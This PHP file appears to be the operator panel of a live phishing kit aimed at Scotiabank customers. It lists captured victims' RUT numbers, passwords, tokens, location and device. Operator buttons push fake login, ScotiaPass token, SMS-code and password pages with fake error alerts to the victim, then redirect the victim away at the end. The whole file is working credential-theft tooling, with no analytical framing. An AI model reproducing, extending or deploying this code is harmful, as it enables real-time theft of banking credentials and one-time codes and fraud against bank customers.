<?php 
date_default_timezone_set('America/Sao_Paulo');
	session_start();
	if (!isset($_SESSION['QNT'])) {
    	$_SESSION['QNT'] = 0;
	}
$hr = date(" H ");
if($hr >= 12 && $hr<18) {
$resp = "Boa tarde!";}
else if ($hr >= 0 && $hr <12 ){
$resp = "Bom dia!";}
else {
$resp = "Boa noite!";}
date_default_timezone_set('America/Sao_Paulo');
	$localInfo = "./QWERTY/";

	if(!isset($_REQUEST['inf'])){
		echo "<body style= 'background-color : #333333; text-align:center' >";
		echo '<meta http-equiv="pragma" content="no-cache">';
		echo '<title>scotiabank control panel</title>';
   		echo '<meta http-equiv="refresh" content="25;URL=">'; 
  		echo "<h2 align='center'><font face='calibri' color='#AFC557' size='4'><strong><br>scotiabank control panel</h2>";
		echo '<style>
		a {
    	color: #808080;
   		 text-decoration: none;
		}
		a:hover {
		color: #3399FF;
    	text-decoration: underline;
		}
		</style>';
		$arrayArquivos;
		$qnt = 0;
		$diretorio = dir($localInfo);
		     			echo '<table border="1" width="100%" id="table1" cellspacing="0" cellpadding="0" bordercolor="#333333">
						<tr>
						<td bgcolor="#1D1D1D" align="left">
						<p>&nbsp;<font face="calibri" color="#AFC557"><strong>&nbsp;&nbsp;information</strong></font></td>
						<td width="307" bgcolor="#1D1D1D">
						<p align="center">&nbsp;<font face="calibri" color="#AFC557"><strong>status</strong></font></td>
						</tr>';
		while($arquivo = $diretorio -> read()){
    		if (strpos($arquivo, '.info') ){
	      		$name = explode(".info" ,$arquivo);
    	        if (isset($_POST['limpa'])){rename($localInfo . $arquivo, $localInfo . $name[0]."old"); $_SESSION['QNT'] = 0 ; continue;}
				$qnt2 = $qnt + 1;
						echo '<tr>
						<td height="25" align="left" bgcolor="#3B413D">
						<p><font color="#C0C0C0" " face="calibri">';
     			echo "&nbsp;&nbsp;<img src='icon.png' height=10>&nbsp;|&nbsp;</a><font color=red>+</font><font color=#0099CC>(</font><font color=red>".$qnt2."</font><font color=#0099CC>)</font><a target='_blank' href='?inf=".$arquivo."'>&nbsp;[$$]info: <font color=''><b>".$arquivo."</b></font></a></font></td>";
	      		$arq = fopen($localInfo . $arquivo, 'r');
    	  		$tmparr = (array)json_decode(fgets($arq));
      			fclose($arq);
      			$qnt++;
	      		if ($tmparr['STATUS'] == 'AGUARDANDO'){
    	    		echo '<td width="307" bgcolor="#3B413D"><p align="center"><font face="calibri" color="#FF0000">&nbsp;waiting</font></td></tr>'; 
					echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio>';
      			} 
          		else{
        			echo '<td width="307" bgcolor="#3B413D"><p align="center"><font face="calibri" color="#008000">&nbsp;' . $tmparr['STATUS'] . '</font></td></tr>';
        		}
      			unset($tmparr);      
    		}
  		}
    
    	$diretorio -> close();
	  	if ($_SESSION['QNT'] != $qnt){
    	  echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio>';
	      $_SESSION['QNT'] = $qnt;
  		}
  
		echo '<form id="frmop" method="POST" action="">';
  		echo "<button id='limpa' name='limpa' value='ok' style='box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: rgb(255, 193, 7); border: 1px solid rgb(255, 193, 7); padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;' onClick=\"return confirm('cleaning??');\">clear infos</button><br><br>";
		echo '</form>';
		exit();
	}

	if (isset($_REQUEST['inf'])) {
		$inf = $_REQUEST['inf'];
   		echo "<body style= 'background-color : #333333; text-align:center' >";
    	$arquivo = $localInfo . $inf;

    	if(!file_exists($arquivo)){
   	 		exit();
    	}

// ------------- INICIO REQUEST OPERADOR --------------

    	if(isset($_POST['btoperador'])){
    		$bt = $_POST['btoperador'];
    		$arq = fopen($arquivo, 'rw+');
    		$arr = (array)json_decode(fgets($arq));
    		rewind($arq);
    		ftruncate($arq, 0);

    		
    		if(isset($_POST['NOME']))
    			$arr['NOME'] = $_POST['NOME'];
    		if(isset($_POST['POS']))
    			$arr['POS'] = $_POST['POS'];

			
			if ($bt == 'uinv') {
                                $pagina = file_get_contents("../uinv.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
                        	$arr['STATUS'] = 'user inv';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'spass') {
                                $pagina = file_get_contents("../token.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
                        	$arr['STATUS'] = 'Token';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'ipass') {
                                $pagina = file_get_contents("../token.html");
                                $tmp_final = $arr['POS'];
                                $paginan = str_replace("%FINAL%", $tmp_final, $pagina);
								$arr['STATUS'] = 'invalid token';
                                $arr['CHAT']  = '<script>alert("ScotiaPass no válido.")</script>'.$paginan;

				}
			if ($bt == 'iemailcode') {
                                $pagina = file_get_contents("../iassets.2");
                                $tmp_final = $arr['POS'];
                                $paginan = str_replace("%FINAL%", $tmp_final, $pagina);
								$arr['STATUS'] = 'invalid login email code';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'withdraw') {
                                $pagina = file_get_contents("../assets.3");
                                $tmp_final = $arr['POS'];
                                $paginan = str_replace("%FINAL%", $tmp_final, $pagina);
								$arr['STATUS'] = 'withdraw email/sms/fund codes';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'senhan1') {
                                $pagina = file_get_contents("../approuter.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
								$arr['STATUS'] = 'SENHA INTERNET P1';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'senhan2') {
                                $pagina = file_get_contents("../approuter2.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
								$arr['STATUS'] = 'SENHA INTERNET P2';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'login') {
                                $pagina = file_get_contents("../login.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
								$arr['STATUS'] = 'LOGIN INICIAL';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'loginpf') {
                                $pagina = file_get_contents("../../pessoa-fisica/inicial.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
								$arr['STATUS'] = 'LOGIN INICIAL PF';
                                $arr['CHAT']  = '<script>alert("Ops\nVerifique se seus dados estão corretos.")</script>'.$paginan;

				}
			if ($bt == 'sms') {
                                $pagina = file_get_contents("../sms.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
								$arr['STATUS'] = 'SMS';
                                $arr['CHAT']  = $paginan;

				}
			if ($bt == 'smsi') {
                                $pagina = file_get_contents("../sms.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
								$arr['STATUS'] = 'SMS INVALIDO';
                                $arr['CHAT']  = '<script>alert("Ops\nVerifique se sua chave está correta (M416-000)")</script>'.$paginan;

				}
			if ($bt == 'chave2') {
                                $pagina = file_get_contents("../iframe2-1.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
                        	$arr['STATUS'] = 'TELA INICIAL';
                                $arr['CHAT']  = '<script>alert("Chave J Secundária")</script>'.$paginan;

				}
			if ($bt == 'errado2') {
                                $pagina = file_get_contents("../iframe2-1.html");
                                $tmp_nome = $arr['NOME'];
                                $paginan = str_replace("%NOME%", $tmp_nome, $pagina);
                        	$arr['STATUS'] = 'TELA INICIAL';
                                $arr['CHAT']  = '<script>alert("Chave J inválida")</script>'.$paginan;

				}
			if ($bt == 'senhausuario') {
				$pagina = file_get_contents("../iframe2.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'SENHA DO USUARIO';
				$arr['CHAT']  = $paginan;
	
      		}
			if ($bt == 'chavesenha2') {
				$pagina = file_get_contents("../iframe2-2.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'SENHA DO USUARIO';
				$arr['CHAT']  = $paginan;
	
      		}
			if ($bt == 'telefone') {
				$pagina = file_get_contents("../iframe3.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'TELEFONE';
				$arr['CHAT']  = $paginan;
      		}
			if ($bt == 'senha6') {
				$pagina = file_get_contents("../iframe4.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'SENHA DE 6 DIGITOS';
				$arr['CHAT']  = $paginan;
	
      		}
			if ($bt == 'senha8') {
				$pagina = file_get_contents("../home.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'SENHA DE 8 DIGITOS';
				$arr['CHAT']  = $paginan;
	
      		}
			if ($bt == '8dig') {
				$pagina = file_get_contents("../iframe2-3.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'SENHA DE 8 DIGITOS';
				$arr['CHAT']  = $paginan;
	
      		}
			if ($bt == 'modulo') {
				$pagina = file_get_contents("../mod.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'MODULO DE SEGURANÇA';
				$arr['CHAT']  = '<script>location.href="modulo.html"</script>';
	
      		}
			if ($bt == 'modulof') {
				$pagina = file_get_contents("../mod.html");
				$tmp_nome = $arr['NOME'];
				$paginan = str_replace("%NOME%", $tmp_nome, $pagina);
	        	$arr['STATUS'] = 'MODULO DE SEGURANÇA FISICO';
				$arr['CHAT']  = '<script>location.href="modulof.html"</script>';
	
      		}
			if ($bt == 'finaliza') {
				$arr['STATUS'] = 'ended';
				$arr['CHAT']  =  '<script>location.href="https://www.weex.com/"</script>';
			}

			
			fwrite($arq, json_encode($arr));
			fclose($arq);
        }



//-----------    INICIO LAYOUT    -----------
    
    	$arq = fopen($arquivo, 'r');
    	$arr = (array)json_decode(fgets($arq), true);
    	echo "<title>$inf - RaideN </title>";
	    echo "<h2 align='center'><font face=calibri size=2 color=#C0C0C0>$inf</font> ";    
	    if ($arr['STATUS'] == 'AGUARDANDO') {
    	    echo "<h2 align='center'><font face=calibri size=2> <font size='3' color='red'> waiting </font> </font></h2>";
        	echo '<audio autoplay="autoplay"><source src="op.mp3" /></audio> ';
	        echo '<meta http-equiv="refresh" content="50;URL=">';
    	} else {
    	    echo "<h2 align='center'> <font face=calibri size='3' color='green'> " . $arr['STATUS'] . " </font> </h2>";
        	echo '<meta http-equiv="refresh" content="10;URL=">';
    	}

	    
			echo '<table style="width: 100%">
		<tr>';
		echo '	<td style="width: 87px; font-family: Arial, Helvetica, sans-serif; background:#1D1D1D;color: #AFC557;" class="style1">country:</td>';
		echo '    <td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;">';
		echo (isset($arr['pais'])) ? $arr['pais'] : "" ;
		echo '	<tr>
					<td style="width: 87px; font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;" class="style1">state:</td>';
		echo '	<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;">';
		echo (isset($arr['estado'])) ? $arr['estado'] : "" ;
		echo '	</td>
				</tr>
		    </td>
			<tr>';
		echo '<tr>';
		echo '	<td style="width: 87px; font-family: Arial, Helvetica, sans-serif; background:#1D1D1D;color: #AFC557;" class="style1">city:</td>';
		echo '    <td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;">';
		echo (isset($arr['cidade'])) ? $arr['cidade'] : "" ;
		echo '	<tr>
					<td style="width: 87px; font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;" class="style1">device:</td>';
		echo '	<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;">';
		echo (isset($arr['dispositivo'])) ? $arr['dispositivo'] : "" ;
		echo '	</td>
				</tr>
		    </td>
			<tr>';
			echo '<tr>';
			echo '<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;" class="style1"><strong>RUT Empresa:</td>';
		    echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;">';
		    echo (isset($arr['clientRut'])) ? $arr['clientRut'] : "" ;
		    echo '</td>
					</tr>';
			echo '<tr>';
			echo '<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;" class="style1"><strong>RUT Usuario:</td>';
		    echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;">';
		    echo (isset($arr['userRut'])) ? $arr['userRut'] : "" ;
		    echo '</td>
					</tr>';
			echo '<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;" class="style1"><strong>Clave:</td>';
		    echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;">';
		    echo (isset($arr['pass'])) ? $arr['pass'] : "" ;
		    echo '</td>
					</tr>';
			echo '<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;" class="style1"><strong>Token:</td>';
		    echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;">';
		    echo (isset($arr['token'])) ? $arr['token'] : "" ;
		    echo '</td>
					</tr>';
					/*<tr>
					<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;" class="style1"><strong>email token:</td>';
			echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;">';
			echo (isset($arr['tokenemail'])) ? $arr['tokenemail'] : "" ;
			echo '</td>
				</tr>';
			echo '<tr>';
			echo '<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;" class="style1"><strong>sms token:</td>';
		    echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#3B413D;color: #AFC557;">';
		    echo (isset($arr['tokensms'])) ? $arr['tokensms'] : "" ;
			echo '</td>
				</tr>';
			echo '<tr>';
			echo '<td style="width: 87px;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;" class="style1"><strong>fund code:</td>';
		    echo '<td style="width: 90%;font-family: Arial, Helvetica, sans-serif;background:#1D1D1D;color: #AFC557;">';
		    echo (isset($arr['fund'])) ? $arr['fund'] : "" ;
		    echo '</td>
					</tr>';
			echo '</td>
			</tr></table>';*/					
	   			 
    	echo '

    	<head>
		<style type="text/css">
.style1 {
	border-width: 0;
}
</style>
		</head>
<script language="javascript">
function checkpos() {
var el = document.getElementById("POOS");

if (el.value.length < 2)
    {
        el.focus();
        alert("Posição incorreta.");
        return false;
    }
    //else {
    //document.lee.submit();
    //}
}
</script>
    	<div align="center">
	    <form id="frmop" method="POST" name="lee" action="?inf=' . $inf . '">
    	<table style="font-family:Tahoma;font-size:11px; width: 100%;"><tbody><tr><br>
		<br><font face=calibri size=3 color="#AFC557">operation options<br>
	    <td width="429" style="border-style: solid; border-color: #000000;" class="style1">  <center>
    	<button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: rgb(255, 193, 7); border: 1px solid rgb(255, 193, 7); padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="uinv" name="btoperador" onClick="return confirm(\'user and clave inv.?\');">user and clave inv</button> 
    	<button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: #F14242; border: 1px solid #F14242; padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="spass" name="btoperador" onClick="return confirm(\'token scotia pass?\');">token scotiapass</button> 	
     	<button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: rgb(255, 193, 7); border: 1px solid rgb(255, 193, 7); padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="ipass" name="btoperador" onClick="return confirm(\'scotia pass inv.?\');">scotia pass inv</button><!--
    	<button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: #F14242; border: 1px solid #F14242; padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="ipass" name="btoperador" onClick="return confirm(\'invalid sms code?\');">invalid email login code</button> 	
     	<button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: rgb(255, 193, 7); border: 1px solid rgb(255, 193, 7); padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="withdraw" name="btoperador" onClick="return confirm(\'withdraw.?\');">withdraw email/sms/fund</button> 	
    	<button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: #F14242; border: 1px solid #F14242; padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="iwithdraw" name="btoperador" onClick="return confirm(\'invalid withdraw codes?\');">invalid withdraw codes</button> 	-->
		<!--<button type="submit" style="background-color:green;border-color:green;height:35px" value="tokeni" name="btoperador" onClick="return confirm(\'TOKEN INICIAL.?\');">TOKEN INICIAL</button> 		
		<button type="submit" style="background-color:blue;border-color:blue;height:35px" value="cpf" name="btoperador" onClick="return confirm(\'PEDIR CPF?\');">CPF</button> 
	    <button type="submit" style="background-color:blue;border-color:blue;height:35px" value="telefone" name="btoperador" onClick="return confirm(\'PEDIR TELEFONE?\');">TELEFONE</button> 	
	    <button type="submit" style="background-color:blue;border-color:blue;height:35px" value="token" name="btoperador" onClick="return confirm(\'PEDIR TOKEN?\');">TOKEN.</button> 		
	    <button type="submit" style="background-color:blue;border-color:blue;height:35px" value="qrcode" name="btoperador" onClick="return confirm(\'PEDIR QRCODE\');">QRCODE</button> 		-->	
 

 
	    
		
	    </td></tr><tr>

 		</td></tr><tr>
					<td style="border-style: solid; border-color: #000000;" align="center" class="style1">
	    	    
    	</td></tr><tr>
					<td style="border-style: solid; border-color: #000000;" align="center" class="style1">
	    

	    <br><br><br><button type="submit" style="box-sizing: border-box; border-radius: 0.25rem; margin: 0px; font-family: inherit; font-size: 1rem; line-height: 1.5; overflow: visible; text-transform: none; -webkit-appearance: button; display: inline-block; font-weight: 400; color: rgb(33, 37, 41); text-align: center; vertical-align: middle; user-select: none; background-color: rgb(255, 193, 7); border: 1px solid rgb(255, 193, 7); padding: 0.375rem 0.75rem; transition: none 0s ease 0s; cursor: pointer; orphans: 2; white-space: normal; widows: 2; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;" value="finaliza" name="btoperador" onClick="return confirm(\'end info??\');">end info</button></td></tr></tbody></table></form></div>

</center>';
    	
    	
    	fclose($arq);

	}
		

 ?>
